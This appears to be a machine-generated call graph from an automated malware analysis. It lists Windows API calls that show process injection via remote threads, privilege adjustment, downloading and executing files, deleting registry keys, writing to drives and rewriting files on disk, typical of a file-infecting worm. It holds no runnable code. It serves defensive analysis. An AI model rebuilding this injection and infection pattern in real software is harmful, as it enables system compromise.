41717->41718 41719 242e54b Sleep 41718->41719 41720 242e558 lstrcpy LoadLibraryA 41718->41720 41719->41718 41721 242e591 GetProcAddress 41720->41721 41722 242e5a9 41720->41722 41721->41722 41723 242e5b2 FreeLibrary lstrcat LoadLibraryA 41722->41723 41724 242e606 CreateThread 41722->41724 41723->41724 41725 242e5ee GetProcAddress 41723->41725 41726 24210e5 3 API calls 41724->41726 42357 242dd99 41724->42357 41725->41724 41727 242e62a CreateThread 41726->41727 41728 24210e5 3 API calls 41727->41728 42350 242cc39 Sleep 41727->42350 41729 242e651 Sleep 41728->41729 41730 242e685 41729->41730 41731 242e68e CreateThread 41730->41731 41732 242e6bc Sleep 41730->41732 41736 242e66b Sleep 41730->41736 41733 24210e5 3 API calls 41731->41733 42398 242ca87 41731->42398 42340 242c5ae wsprintfA RegOpenKeyExA 41732->42340 41733->41730 41736->41730 41737 242c5ae 58 API calls 41738 242e6de Sleep 41737->41738 41741 242f030 2 API calls 41740->41741 41742 2423de7 41741->41742 41743 242f760 15 API calls 41742->41743 41744 2423df4 41743->41744 42489 2423d16 41744->42489 41747 2423f2c RtlExitUserThread 41748 2423ec5 Sleep 41755 2423e04 41748->41755 41749 2423e5b CreateThread 41750 24210e5 3 API calls 41749->41750 42494 2423b41 41749->42494 41752 2423e84 Sleep 41750->41752 41751 2423edd Sleep 41753 2423eff Sleep 41751->41753 41751->41755 41754 2423e92 41752->41754 41756 242f760 15 API calls 41753->41756 41754->41755 41757 2423e9b Sleep 41754->41757 41755->41747 41755->41748 41755->41749 41755->41751 41755->41753 41758 2423f17 41756->41758 41757->41754 41759 2423d16 4 API calls 41758->41759 41760 2423f1c Sleep 41759->41760 41760->41755 41762 24253c1 Sleep 41761->41762 41763 24253ce Sleep 41761->41763 41764 24253d9 41762->41764 41763->41764 42527 24243ec RegOpenKeyExA 41764->42527 41767 24243ec 7 API calls 41768 242540b LoadLibraryA 41767->41768 41769 24255fa RtlExitUserThread 41768->41769 41770 2425428 GetProcAddress 41768->41770 41773 2425540 41769->41773 41771 2425446 41770->41771 41772 242544b GetProcAddress 41770->41772 41774 242546a 41772->41774 41775 242546f GetProcAddress 41772->41775 41773->41769 41776 2425493 GetProcAddress 41775->41776 41777 242548e 41775->41777 41778 24254b1 41776->41778 41779 24254b6 GetProcAddress 41776->41779 41780 24254d5 41779->41780 41781 24254da GetProcAddress 41779->41781 41782 24254f9 41781->41782 41783 24254fe GetProcAddress 41781->41783 41784 2425521 GetProcAddress 41783->41784 41785 242551c 41783->41785 41784->41773 41786 2425545 41784->41786 42538 24247bf GetSystemDirectoryA lstrlen lstrcat lstrcat lstrcat 41786->42538 41788 242554a CreateThread 41789 24210e5 3 API calls 41788->41789 42545 24248d6 Sleep Sleep lstrlen Sleep RtlExitUserThread 41788->42545 41790 242556b LoadLibraryA 41789->41790 41790->41769 41791 2425584 GetProcAddress 41790->41791 41791->41769 41792 24255a2 41791->41792 42539 2424649 CreateFileA CloseHandle 41792->42539 41794 24255a7 41801 24255c1 41794->41801 42540 2424595 DeleteFileA CreateFileA WriteFile CloseHandle 41794->42540 41797 24255c9 41797->41769 42543 2424bd0 27 API calls 41797->42543 41798 24255b0 42541 242470f SetFileAttributesA DeleteFileA 41798->42541 42542 2424649 CreateFileA CloseHandle 41801->42542 41802 24255d2 41802->41769 41803 24255d6 CreateThread 41802->41803 41804 24210e5 3 API calls 41803->41804 42544 2425388 25 API calls 41803->42544 41804->41773 41806 2433600 41805->41806 41807 242391e htons socket 41806->41807 41808 2423a0a setsockopt bind 41807->41808 41810 2423a05 41807->41810 41809 2423a53 41808->41809 41808->41810 41809->41810 41811 2423a60 recvfrom 41809->41811 41812 2423b21 closesocket 41810->41812 41813 2423b2e RtlExitUserThread 41810->41813 41811->41809 41814 2423a9c InterlockedExchange CreateThread 41811->41814 41812->41813 41813->41810 41815 24210e5 3 API calls 41814->41815 42546 2423536 42 API calls 41814->42546 41816 2423afd 41815->41816 41816->41809 41817 2423b09 Sleep 41816->41817 41817->41816 41819 242d509 CloseHandle 41818->41819 41820 242d2f9 Process32First 41818->41820 41819->41681 41821 242d40b Process32Next 41820->41821 41822 242d32d 41820->41822 41821->41819 41833 242d426 41821->41833 41822->41821 41823 242d33a lstrlen 41822->41823 41824 242d364 lstrcpy 41823->41824 41825 242d34c lstrcpyn 41823->41825 41827 242d378 7 API calls 41824->41827 41825->41827 41826 242d433 lstrlen 41828 242d445 lstrcpyn 41826->41828 41829 242d45d lstrcpy 41826->41829 41827->41821 41830 242d3f5 41827->41830 41831 242d471 7 API calls 41828->41831 41829->41831 41832 242cc92 38 API calls 41830->41832 41831->41833 41834 242d408 41832->41834 41833->41821 41833->41826 41836 242cc92 41833->41836 41834->41821 41837 2433600 41836->41837 41838 242ccbc OpenProcess 41837->41838 41839 242cf43 OpenProcessToken 41838->41839 41840 242cd96 GetLastError 41838->41840 41841 242cf69 GetTokenInformation 41839->41841 41878 242cdde 41839->41878 41842 242cda5 GetVersionExA 41840->41842 41840->41878 41844 242cf93 GetLastError 41841->41844 41841->41878 41843 242cdea GetCurrentThread OpenThreadToken 41842->41843 41842->41878 41845 242ce10 GetLastError 41843->41845 41846 242ce4f LookupPrivilegeValueA AdjustTokenPrivileges 41843->41846 41847 242cfaa GetProcessHeap RtlAllocateHeap 41844->41847 41844->41878 41852 242ce29 GetCurrentProcess OpenProcessToken 41845->41852 41845->41878 41854 242cea1 CloseHandle 41846->41854 41855 242ceba GetLastError 41846->41855 41853 242cfdb GetTokenInformation 41847->41853 41847->41878 41848 242d250 FindCloseChangeNotification 41849 242d267 41848->41849 41850 242d270 CloseHandle 41849->41850 41851 242d27d 41849->41851 41850->41851 41856 242d286 GetProcessHeap HeapFree 41851->41856 41857 242d29c 41851->41857 41852->41846 41852->41878 41858 242d00f LookupAccountSidA 41853->41858 41853->41878 41854->41878 41859 242cee0 OpenProcess AdjustTokenPrivileges FindCloseChangeNotification 41855->41859 41860 242cec7 CloseHandle 41855->41860 41856->41857 41857->41833 41862 242d063 41858->41862 41858->41878 41861 242cf35 41859->41861 41859->41878 41860->41878 41861->41839 41863 242d06e lstrcmpiA 41862->41863 41862->41878 41864 242d0b0 CreateMutexA 41863->41864 41865 242d084 lstrcmpiA 41863->41865 41864->41878 41865->41864 41866 242d09a lstrcmpiA 41865->41866 41866->41864 41867 242d0ca VirtualAllocEx 41866->41867 41869 242d102 WriteProcessMemory 41867->41869 41870 242d169 VirtualAllocEx 41867->41870 41871 242d134 CreateRemoteThread 41869->41871 41869->41878 41872 242d197 41870->41872 41870->41878 41873 242d162 41871->41873 41871->41878 41874 242d1aa lstrlen 41872->41874 41873->41870 41875 2432ceb 41874->41875 41876 242d1c8 WriteProcessMemory 41875->41876 41877 242d1fc CreateRemoteThread 41876->41877 41876->41878 41877->41878 41878->41848 41878->41849 41880 2425722 41879->41880 41881 242573a SetFileAttributesA DeleteFileA 41879->41881 41886 2429652 41880->41886 41883 2425738 41881->41883 41883->41699 41885->41699 41887 242967c 41886->41887 41986 24213e8 InterlockedExchange 41887->41986 41889 242977f 41987 24213e8 InterlockedExchange 41889->41987 41891 24297c2 lstrcpy CharUpperA 41988 24242c7 41891->41988 41893 242572f 41893->41881 41893->41883 41894 2429a61 41895 2429aa0 RtlEnterCriticalSection 41894->41895 41896 2429a6a MultiByteToWideChar 41894->41896 41902 2429ac5 41895->41902 41897 2429a95 41896->41897 41897->41893 41897->41895 41898 24242c7 2 API calls 41899 24299e6 41898->41899 41899->41893 41899->41894 41899->41898 41900 2429a4a 41899->41900 41901 2425719 11 API calls 41900->41901 41901->41893 41903 2429b03 GetLocalTime GetFileAttributesA SetFileAttributesA 41902->41903 41904 2429b33 41903->41904 41905 2429b3f CreateFileA 41903->41905 41908 242b832 RtlLeaveCriticalSection 41904->41908 41909 242b821 GlobalFree 41904->41909 41906 2429b6a GetFileSize 41905->41906 41907 2429b7f 41905->41907 41906->41907 41910 242b7d4 FindCloseChangeNotification SetFileAttributesA 41907->41910 41913 2429bac GetFileTime CreateFileMappingA 41907->41913 41908->41893 41911 242b84d Sleep 41908->41911 41909->41908 41910->41904 41912 242b7f8 DeleteFileA 41910->41912 41911->41893 41912->41904 41914 2429c0f MapViewOfFile 41913->41914 41917 2429e9a 41913->41917 41914->41917 41924 2429c31 41914->41924 41915 242b724 FindCloseChangeNotification 41915->41910 41916 242b73e SetFilePointer SetEndOfFile 41915->41916 41920 242b774 41916->41920 41921 242b79b 41916->41921 41917->41915 41918 242b517 41917->41918 41919 242b71a UnmapViewOfFile 41917->41919 41928 242b53c 41917->41928 41918->41917 41918->41919 41922 242b6dc GlobalAlloc 41918->41922 41919->41915 41920->41921 41923 242b77a WriteFile 41920->41923 41925 242b7b2 SetFileTime 41921->41925 41926 242b7a1 GlobalFree 41921->41926 41927 242b6ce 41922->41927 41923->41921 41924->41917 41992 24213e8 InterlockedExchange 41924->41992 41925->41910 41926->41925 41927->41919 41928->41927 41930 2429cde 41932 2429d01 41930->41932 42138 24213e8 InterlockedExchange 41930->42138 41932->41917 41933 242a081 lstrcpyn lstrcmpiA 41932->41933 41934 242a0b7 41933->41934 41934->41917 41935 242a149 GlobalAlloc 41934->41935 41937 242a17e 41934->41937 41936 242a17b 41935->41936 41936->41937 41993 24213e8 InterlockedExchange 41937->41993 41939 242a914 41940 242a97e 41939->41940 42139 24280da InterlockedExchange 41939->42139 41942 242a9fa 41940->41942 42140 24280da InterlockedExchange 41940->42140 41943 242aa51 41942->41943 42141 24280da InterlockedExchange 41942->42141 41994 24213e8 InterlockedExchange 41943->41994 41945 242a5c5 IsBadHugeWritePtr 41949 242a1f7 41945->41949 41948 242aa67 41950 242aae2 41948->41950 42142 24280da InterlockedExchange 41948->42142 41949->41917 41949->41939 41949->41945 41956 242a5f3 41949->41956 41954 242aaf9 41950->41954 42143 2427b42 41950->42143 41953 242abd9 41995 24213e8 InterlockedExchange 41953->41995 41954->41953 42157 24280da InterlockedExchange 41954->42157 41958 242a6e0 IsBadHugeWritePtr 41956->41958 41958->41939 41959 242a705 IsBadHugeWritePtr 41958->41959 41959->41939 41974 242a71c 41959->41974 41960 242abef 41961 242ac7a 41960->41961 41963 242acb7 41960->41963 42158 24280da InterlockedExchange 41960->42158 42159 242687e 41961->42159 41963->41917 41996 242867a 41963->41996 41967 2427c71 2 API calls 41976 242ade3 41967->41976 41968 242a778 IsBadHugeWritePtr 41969 242a79b IsBadHugeWritePtr 41968->41969 41968->41974 41969->41974 41970 242a7c7 lstrcmpiA 41971 242a826 lstrcmpiA 41970->41971 41970->41974 41972 242a85b lstrcmpiA 41971->41972 41971->41974 41973 242a88d lstrcmpiA 41972->41973 41972->41974 41973->41974 41975 242a8ce lstrcmpiA 41973->41975 41974->41939 41974->41968 41974->41970 41974->41971 41974->41972 41974->41973 41974->41975 41975->41974 41976->41917 42187 2422745 41976->42187 41978 242b31f 41979 242b3f2 41978->41979 42198 24213e8 InterlockedExchange 41979->42198 41981 242b43c GetTickCount 41981->41918 41982 242b469 41981->41982 42199 24213e8 InterlockedExchange 41982->42199 41984 242b46e 41984->41918 42200 24213e8 InterlockedExchange 41984->42200 41986->41889 41987->41891 41991 24242d0 41988->41991 41989 2424353 41989->41899 41990 2424317 tolower tolower 41990->41991 41991->41989 41991->41990 41992->41930 41993->41949 41994->41948 41995->41960 41997 24286e3 41996->41997 42001 2428714 41997->42001 42229 24213e8 InterlockedExchange 41997->42229 41999 2428789 42201 24213e8 InterlockedExchange 41999->42201 42001->41999 42230 24280da InterlockedExchange 42001->42230 42002 24287a8 42004 24287d7 42002->42004 42231 24213e8 InterlockedExchange 42002->42231 42006 2427b42 InterlockedExchange 42004->42006 42007 2428810 42006->42007 42008 2427b42 InterlockedExchange 42007->42008 42009 2428838 42008->42009 42202 24213e8 InterlockedExchange 42009->42202 42011 2428862 42012 2428891 42011->42012 42232 24213e8 InterlockedExchange 42011->42232 42014 2427b42 InterlockedExchange 42012->42014 42015 24288b8 42014->42015 42016 2427b42 InterlockedExchange 42015->42016 42017 24288f5 42016->42017 42018 242687e InterlockedExchange 42017->42018 42019 2428930 42018->42019 42203 24213e8 InterlockedExchange 42019->42203 42021 2428940 42204 2425ccb 42021->42204 42023 242896c 42208 24213e8 InterlockedExchange 42023->42208 42025 2428982 42026 24289b1 42025->42026 42233 24213e8 InterlockedExchange 42025->42233 42028 2427b42 InterlockedExchange 42026->42028 42029 24289e2 42028->42029 42209 24213e8 InterlockedExchange 42029->42209 42031 24289f8 42032 2428a2f 42031->42032 42234 24213e8 InterlockedExchange 42031->42234 42034 2427b42 InterlockedExchange 42032->42034 42035 2428a72 42034->42035 42036 242687e InterlockedExchange 42035->42036 42037 2428adf 42036->42037 42210 24284e6 42037->42210 42039 2428b05 42040 242687e InterlockedExchange 42039->42040 42041 2428b25 42040->42041 42042 2427b42 InterlockedExchange 42041->42042 42043 2428b4d 42042->42043 42044 242687e InterlockedExchange 42043->42044 42045 2428ba8 42044->42045 42223 24213e8 InterlockedExchange 42045->42223 42047 2428bd2 42049 2428c11 42047->42049 42235 24213e8 InterlockedExchange 42047->42235 42050 2427b42 InterlockedExchange 42049->42050 42051 2428c4e 42050->42051 42224 24213e8 InterlockedExchange 42051->42224 42053 2428c5e 42055 2428c9d 42053->42055 42236 24213e8 InterlockedExchange 42053->42236 42056 2427b42 InterlockedExchange 42055->42056 42057 2428ce0 42056->42057 42058 242687e InterlockedExchange 42057->42058 42059 2428d00 42058->42059 42060 242687e InterlockedExchange 42059->42060 42061 2428d3a 42060->42061 42062 24284e6 InterlockedExchange 42061->42062 42063 2428d60 42062->42063 42064 242687e InterlockedExchange 42063->42064 42065 2428d80 42064->42065 42066 24284e6 InterlockedExchange 42065->42066 42067 2428da6 42066->42067 42068 242687e InterlockedExchange 42067->42068 42069 2428dec 42068->42069 42070 2427b42 InterlockedExchange 42069->42070 42071 2428e14 42070->42071 42225 24213e8 InterlockedExchange 42071->42225 42073 2428e24 42075 2428e63 42073->42075 42237 24213e8 InterlockedExchange 42073->42237 42076 2427b42 InterlockedExchange 42075->42076 42077 2428ebb 42076->42077 42078 2427b42 InterlockedExchange 42077->42078 42079 2428f2e 42078->42079 42080 2427b42 InterlockedExchange 42079->42080 42081 2428f56 42080->42081 42226 24213e8 InterlockedExchange 42081->42226 42083 2428f66 42085 2428fa5 42083->42085 42238 24213e8 InterlockedExchange 42083->42238 42086 2427b42 InterlockedExchange 42085->42086 42087 2428ff2 42086->42087 42088 242687e InterlockedExchange 42087->42088 42089 242905f 42088->42089 42090 24284e6 InterlockedExchange 42089->42090 42091 2429085 42090->42091 42092 242687e InterlockedExchange 42091->42092 42093 24290a5 42092->42093 42094 242687e InterlockedExchange 42093->42094 42095 24290fb 42094->42095 42096 242687e InterlockedExchange 42095->42096 42097 2429156 42096->42097 42098 2427b42 InterlockedExchange 42097->42098 42099 24291b4 42098->42099 42100 2427b42 InterlockedExchange 42099->42100 42101 24291dc 42100->42101 42227 24213e8 InterlockedExchange 42101->42227 42103 24291ec 42105 2429233 42103->42105 42239 24213e8 InterlockedExchange 42103->42239 42106 2427b42 InterlockedExchange 42105->42106 42107 242928a 42106->42107 42108 242687e InterlockedExchange 42107->42108 42109 24292aa 42108->42109 42110 242687e InterlockedExchange 42109->42110 42111 2429317 42110->42111 42112 24284e6 InterlockedExchange 42111->42112 42113 242933d 42112->42113 42114 242687e InterlockedExchange 42113->42114 42115 242935d 42114->42115 42116 2427b42 InterlockedExchange 42115->42116 42117 2429383 42116->42117 42118 2427b42 InterlockedExchange 42117->42118 42119 24293ab 42118->42119 42228 24213e8 InterlockedExchange 42119->42228 42121 24293f6 42123 242943d 42121->42123 42240 24213e8 InterlockedExchange 42121->42240 42124 2427b42 InterlockedExchange 42123->42124 42125 2429494 42124->42125 42126 2427b42 InterlockedExchange 42125->42126 42127 24294bc 42126->42127 42128 2427b42 InterlockedExchange 42127->42128 42129 24294e4 42128->42129 42130 2427b42 InterlockedExchange 42129->42130 42131 242950a 42130->42131 42132 2427b42 InterlockedExchange 42131->42132 42133 2429533 42132->42133 42134 2427b42 InterlockedExchange 42133->42134 42135 24295b8 42134->42135 42136 2427b42 InterlockedExchange 42135->42136 42137 24295ed 42136->42137 42137->41917 42137->41967 42138->41932 42139->41940 42140->41942 42141->41943 42142->41950 42144 242687e InterlockedExchange 42143->42144 42145 2427b61 42144->42145 42146 2427ba2 42145->42146 42147 2427b72 42145->42147 42149 2427bd5 42146->42149 42150 2427ba8 42146->42150 42245 2426a85 InterlockedExchange 42147->42245 42153 2427c06 42149->42153 42154 2427bdb 42149->42154 42246 2427410 InterlockedExchange 42150->42246 42151 2427b92 42151->41954 42153->42151 42248 24279f3 InterlockedExchange 42153->42248 42247 24278a4 InterlockedExchange 42154->42247 42157->41953 42158->41961 42160 24268a6 42159->42160 42166 242689f 42159->42166 42249 24213e8 InterlockedExchange 42160->42249 42162 24268b2 42184 24268df 42162->42184 42250 24213e8 InterlockedExchange 42162->42250 42165 24268cd 42165->42184 42251 24213e8 InterlockedExchange 42165->42251 42166->41963 42168 24268fb 42169 2426911 42168->42169 42170 2426998 42168->42170 42252 24213e8 InterlockedExchange 42169->42252 42256 24213e8 InterlockedExchange 42170->42256 42173 242699d 42175 2426968 42173->42175 42257 24213e8 InterlockedExchange 42173->42257 42174 2426916 42176 2426943 42174->42176 42177 242692c 42174->42177 42259 24213e8 InterlockedExchange 42175->42259 42254 24213e8 InterlockedExchange 42176->42254 42253 24213e8 InterlockedExchange 42177->42253 42182 24269b4 42258 24213e8 InterlockedExchange 42182->42258 42183 2426931 42255 24213e8 InterlockedExchange 42183->42255 42260 24213e8 InterlockedExchange 42184->42260 42261 24213e8 InterlockedExchange 42187->42261 42189 2422754 42190 2422a79 42189->42190 42191 2422b0f 42189->42191 42197 24227a3 42189->42197 42192 2422a86 42190->42192 42193 2422ad5 42190->42193 42191->42197 42264 242231e InterlockedExchange CreateFileMappingA MapViewOfFile UnmapViewOfFile CloseHandle 42191->42264 42262 2421420 InterlockedExchange 42192->42262 42263 2421420 InterlockedExchange 42193->42263 42197->41978 42198->41981 42199->41984 42200->41984 42201->42002 42202->42011 42203->42021 42205 2425da7 42204->42205 42241 24213e8 InterlockedExchange 42205->42241 42207 2425e39 42207->42023 42208->42025 42209->42031 42211 2428521 42210->42211 42212 2428673 42211->42212 42213 242853b 42211->42213 42242 24213e8 InterlockedExchange 42211->42242 42212->42039 42243 24213e8 InterlockedExchange 42213->42243 42216 24285a0 42218 2427b42 InterlockedExchange 42216->42218 42219 24285c5 42216->42219 42217 242855f 42217->42216 42244 24213e8 InterlockedExchange 42217->42244 42218->42219 42221 242687e InterlockedExchange 42219->42221 42222 2428663 42221->42222 42222->42039 42223->42047 42224->42053 42225->42073 42226->42083 42227->42103 42228->42121 42229->41997 42230->42001 42231->42002 42232->42011 42233->42025 42234->42031 42235->42047 42236->42053 42237->42073 42238->42083 42239->42103 42240->42121 42241->42207 42242->42213 42243->42217 42244->42216 42245->42151 42246->42151 42247->42151 42248->42151 42249->42162 42250->42165 42251->42168 42252->42174 42253->42183 42254->42183 42255->42175 42256->42173 42257->42182 42258->42175 42259->42184 42260->42166 42261->42189 42262->42197 42263->42197 42264->42197 42265->41706 42267 2425c43 42266->42267 42268 2425c34 lstrcat 42266->42268 42314 2425618 42267->42314 42268->42267 42270 2425c4f lstrcpy 42319 24213e8 InterlockedExchange 42270->42319 42272 2425c65 42273 2425c77 lstrlen wsprintfA 42272->42273 42274 2425c9f lstrlen wsprintfA 42272->42274 42275 2425cc6 42273->42275 42274->42275 42275->41715 42322 2425b02 42276->42322 42279 242bad2 42279->41715 42280 242b94d InternetOpenA 42281 242baa6 42280->42281 42282 242b974 InternetOpenUrlA 42280->42282 42284 242baaf InternetCloseHandle 42281->42284 42285 242babc 42281->42285 42282->42281 42283 242b9a6 42282->42283 42287 242b9ce InternetReadFile 42283->42287 42288 242b9ac CreateFileA 42283->42288 42284->42285 42285->42279 42286 242bac5 InternetCloseHandle 42285->42286 42286->42279 42292 242b9f6 42287->42292 42288->42287 42289 242ba99 CloseHandle 42289->42281 42290 242ba12 WriteFile 42290->42292 42291 242ba58 42291->42289 42292->42287 42292->42289 42292->42290 42292->42291 42294 242bf26 42293->42294 42295 242bf2d GlobalAlloc ReadFile 42293->42295 42294->41715 42296 242bf66 lstrlen 42295->42296 42308 242bfa2 42295->42308 42298 242bf86 42296->42298 42297 242c015 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 42299 242c080 42297->42299 42300 242c08c 42297->42300 42298->42297 42299->42300 42302 242c0b0 42299->42302 42303 242c092 GlobalFree 42300->42303 42304 242c09c DeleteFileA 42300->42304 42301 242bfd1 lstrlen 42301->42308 42305 242c0c0 lstrcpy lstrlen 42302->42305 42306 242c0b6 GlobalFree 42302->42306 42303->42304 42304->42294 42307 242c137 42305->42307 42306->42305 42309 242c174 CreateProcessA Sleep CreateThread 42307->42309 42310 242c162 42307->42310 42308->42297 42308->42301 42311 24210e5 3 API calls 42309->42311 42339 242569f lstrcpy GetFileAttributesA DeleteFileA Sleep RtlExitUserThread 42309->42339 42310->42309 42312 242c1d6 Sleep 42311->42312 42312->42294 42313->41712 42320 24213e8 InterlockedExchange 42314->42320 42316 242568a lstrcpy 42316->42270 42318 242563f 42318->42316 42321 24213e8 InterlockedExchange 42318->42321 42319->42272 42320->42318 42321->42318 42323 24242c7 2 API calls 42322->42323 42324 2425b15 42323->42324 42325 2425be2 42324->42325 42326 24242c7 2 API calls 42324->42326 42325->42279 42325->42280 42327 2425b30 42326->42327 42327->42325 42328 2425b3b 42327->42328 42329 24242c7 2 API calls 42328->42329 42330 2425b49 42329->42330 42331 2425b50 GetTickCount 42330->42331 42332 2425b9a GetTickCount 42330->42332 42337 24213e8 InterlockedExchange 42331->42337 42338 24213e8 InterlockedExchange 42332->42338 42335 2425b5d GetTickCount lstrlen wsprintfA 42335->42325 42336 2425ba7 GetTickCount lstrlen wsprintfA 42336->42325 42337->42335 42338->42336 42341 242c787 42340->42341 42348 242c681 42340->42348 42341->41737 42342 242c69c RegEnumValueA 42343 242c773 RegCloseKey 42342->42343 42342->42348 42343->42341 42345 24242c7 2 API calls 42345->42348 42346 242c716 lstrlen lstrlen 42346->42348 42347 2429652 51 API calls 42349 242c763 Sleep 42347->42349 42348->42342 42348->42345 42348->42346 42348->42347 42349->42348 42351 242cc47 42350->42351 42352 242cc86 RtlExitUserThread 42351->42352 42405 242cb2d RegOpenKeyExA 42351->42405 42354 242cc5c Sleep 42355 242cb2d 56 API calls 42354->42355 42356 242cc76 Sleep 42355->42356 42356->42351 42358 242ddc3 42357->42358 42414 24213e8 InterlockedExchange 42358->42414 42360 242de99 Sleep 42361 2425be5 10 API calls 42360->42361 42362 242debf CreateFileA 42361->42362 42363 242df1a 42362->42363 42364 242deed WriteFile CloseHandle 42362->42364 42365 2429652 51 API calls 42363->42365 42366 242df36 Sleep 42363->42366 42371 242df43 42363->42371 42364->42363 42365->42363 42366->42363 42367 242e4d3 RtlExitUserThread 42369 242dc56 11 API calls 42370 242df9a Sleep GetLogicalDrives 42369->42370 42370->42371 42371->42367 42371->42369 42372 242e4c3 Sleep 42371->42372 42373 242e007 GetDriveTypeA 42371->42373 42372->42371 42373->42371 42374 242e04b lstrcat CreateFileA 42373->42374 42375 242e2b0 GetFileAttributesA 42374->42375 42376 242e08d GetFileTime FileTimeToSystemTime 42374->42376 42377 242e2f7 CreateFileA 42375->42377 42378 242e2cc SetFileAttributesA DeleteFileA 42375->42378 42379 242e2a3 CloseHandle 42376->42379 42393 242e0cb 42376->42393 42377->42371 42381 242e326 GetSystemTime SystemTimeToFileTime 42377->42381 42454 2425758 SHFileOperation RemoveDirectoryA 42378->42454 42379->42375 42383 2425618 2 API calls 42381->42383 42382 242e2f4 42382->42377 42389 242e394 42383->42389 42384 242e100 ReadFile CharLowerA lstrlen 42384->42393 42395 242e297 42384->42395 42386 24242c7 2 API calls 42386->42393 42387 242e3c2 lstrcat 42387->42389 42388 242e3ae lstrcat 42388->42389 42389->42387 42389->42388 42415 24213e8 InterlockedExchange 42389->42415 42416 242d928 42389->42416 42391 242e3e7 6 API calls 42391->42371 42392 242e47e WriteFile CloseHandle SetFileAttributesA 42391->42392 42392->42371 42393->42379 42393->42384 42393->42386 42394 242e1f3 lstrcpy GetFileAttributesA 42393->42394 42393->42395 42394->42395 42396 242e21f CloseHandle CreateFileA 42394->42396 42395->42379 42396->42395 42397 242e257 WriteFile CloseHandle SetFileAttributesA 42396->42397 42397->42395 42399 2433600 42398->42399 42400 242ca94 lstrcpy GetDriveTypeA 42399->42400 42401 242cb04 42400->42401 42402 242cb1e RtlExitUserThread 42400->42402 42467 242badd Sleep 42401->42467 42406 242cb83 RegEnumValueA 42405->42406 42407 242cc27 RegCloseKey 42405->42407 42408 242cbc7 42406->42408 42409 242cbd2 42406->42409 42407->42354 42408->42409 42410 242cbd4 GetFileAttributesA 42408->42410 42409->42407 42413 242cbe6 42410->42413 42411 242cbfd Sleep 42411->42406 42411->42407 42412 2429652 51 API calls 42412->42413 42413->42411 42413->42412 42414->42360 42415->42389 42417 242d9bd 42416->42417 42455 24213e8 InterlockedExchange 42417->42455 42419 242d9c5 42420 242d9e3 lstrcat 42419->42420 42456 242d7cf 10 API calls 42419->42456 42457 24213e8 InterlockedExchange 42420->42457 42423 242d9e0 42423->42420 42424 242d9f8 42425 242da13 42424->42425 42458 242d7cf 10 API calls 42424->42458 42427 242db9e 42425->42427 42428 242da3e 42425->42428 42465 24213e8 InterlockedExchange 42427->42465 42459 24213e8 InterlockedExchange 42428->42459 42431 242dba3 42432 242dbbe 42431->42432 42466 242d7cf 10 API calls 42431->42466 42432->42391 42434 242db99 42434->42391 42435 242da43 42435->42434 42460 24213e8 InterlockedExchange 42435->42460 42437 242da8e 42438 242daac lstrcpy 42437->42438 42461 242d7cf 10 API calls 42437->42461 42462 242d6fc InterlockedExchange 42438->42462 42441 242dade 42443 24242c7 2 API calls 42441->42443 42442 242daa9 42442->42438 42444 242daf2 42443->42444 42445 242db88 lstrcat 42444->42445 42463 24213e8 InterlockedExchange 42444->42463 42445->42434 42447 242db02 42448 242db26 lstrcat 42447->42448 42449 242db14 lstrcat 42447->42449 42464 24213e8 InterlockedExchange 42448->42464 42449->42448 42451 242db3d 42452 242db61 lstrlen wsprintfA 42451->42452 42453 242db4f lstrcat 42451->42453 42452->42445 42453->42452 42454->42382 42455->42419 42456->42423 42457->42424 42458->42425 42459->42435 42460->42437 42461->42442 42462->42441 42463->42447 42464->42451 42465->42431 42466->42432 42468 242bb84 lstrcpy CharLowerA 42467->42468 42469 242bb6c lstrcat 42467->42469 42470 24242c7 2 API calls 42468->42470 42469->42468 42471 242bbb3 42470->42471 42472 242bbd6 lstrcat FindFirstFileA 42471->42472 42473 242bbba 42471->42473 42474 242bc06 FindNextFileA 42472->42474 42475 242bc38 42472->42475 42473->42402 42474->42475 42487 242bc1f 42474->42487 42476 242be6b Sleep 42475->42476 42477 242be5e FindClose 42475->42477 42476->42473 42477->42476 42478 242bc46 Sleep 42479 242bc6d lstrlen 42478->42479 42480 242bc9b lstrcat lstrlen CharUpperA lstrlen 42479->42480 42479->42487 42481 242bce8 lstrcmpiA 42480->42481 42480->42487 42482 242bd00 lstrcmpiA 42481->42482 42481->42487 42482->42487 42483 242bda1 lstrcpy lstrlen lstrcmpiA 42483->42487 42484 2429652 51 API calls 42484->42487 42485 242badd 51 API calls 42485->42487 42486 24242c7 2 API calls 42486->42487 42487->42474 42487->42475 42487->42478 42487->42479 42487->42483 42487->42484 42487->42485 42487->42486 42488 2425719 51 API calls 42487->42488 42488->42487 42490 242f030 2 API calls 42489->42490 42491 2423d24 42490->42491 42492 242f310 2 API calls 42491->42492 42493 2423d97 Sleep 42492->42493 42493->41755 42495 2433600 42494->42495 42496 2423b4e InterlockedIncrement htons 42495->42496 42497 2423bf4 42496->42497 42510 2422fa0 42497->42510 42500 2423cd1 42504 2423cfc InterlockedDecrement RtlExitUserThread 42500->42504 42501 2423c17 GetTickCount 42502 2423c53 42501->42502 42503 2423c68 42501->42503 42505 2422fa0 32 API calls 42502->42505 42506 2423c8a 42503->42506 42525 24232dc 10 API calls 42503->42525 42505->42503 42507 2423ccc 42506->42507 42526 2422cfa 12 API calls 42506->42526 42507->42504 42511 2433600 42510->42511 42512 2422fad socket 42511->42512 42513 2423021 42512->42513 42524 2423154 42512->42524 42516 2422745 5 API calls 42513->42516 42514 24232bf closesocket 42515 24232cc 42514->42515 42515->42500 42515->42501 42517 242303f 42516->42517 42518 2423055 sendto 42517->42518 42517->42524 42519 2423081 select 42518->42519 42518->42524 42521 2423159 recvfrom 42519->42521 42519->42524 42522 2423192 42521->42522 42521->42524 42523 2422399 22 API calls 42522->42523 42522->42524 42523->42524 42524->42514 42524->42515 42525->42506 42526->42507 42528 242451d 42527->42528 42530 2424416 42527->42530 42528->41767 42529 2424424 RegEnumValueA 42529->42530 42536 242445b 42529->42536 42530->42529 42531 242445d RegDeleteValueA 42530->42531 42530->42536 42531->42529 42532 2424485 RegEnumKeyExA 42533 2424513 RegCloseKey 42532->42533 42532->42536 42533->42528 42534 24244ba wsprintfA 42534->42536 42535 24244b8 42535->42533 42536->42532 42536->42534 42536->42535 42537 24244ec RegDeleteKeyA 42536->42537 42537->42532 42538->41788 42539->41794 42540->41798 42541->41801 42542->41797 42543->41802 42547 24abcd0 42548 24abce8 42547->42548 42549 24abe02 LoadLibraryA 42548->42549 42550 24abe47 VirtualProtect VirtualProtect 42548->42550 42551 24abe19 42549->42551 42553 24abeac 42550->42553 42551->42548 42554 24abe2b GetProcAddress 42551->42554 42553->42553 42554->42551 